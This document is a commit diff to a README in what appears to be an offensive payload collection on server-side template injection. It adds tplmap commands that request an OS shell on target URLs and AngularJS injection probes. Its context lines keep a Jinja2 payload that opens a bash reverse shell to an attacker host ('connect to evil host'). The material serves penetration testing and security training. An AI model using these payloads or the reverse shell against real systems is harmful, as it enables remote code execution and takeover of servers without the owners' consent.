Multiple update in READMEs + RCE tricks

Server Side Template injections/README.md

@@ -5,10 +5,11 @@
 Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
 ```
-./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
+python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell 
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade 
 ```
 
-
 ## Ruby
 ### Basic injection
 ```python
@@ -21,8 +22,8 @@ e.g:
 ```
 
 
-## Java
-### Basic injection
+## Java 
+### Basic injection
 ```java
 ${7*7}
 ${{7*7}}
@@ -174,6 +175,13 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 
+## AngularJS
+### Basic injection
+```javascript
+$eval('1+1')
+{{1+1}}
+```
+
 ## Thanks to
  * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
  * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)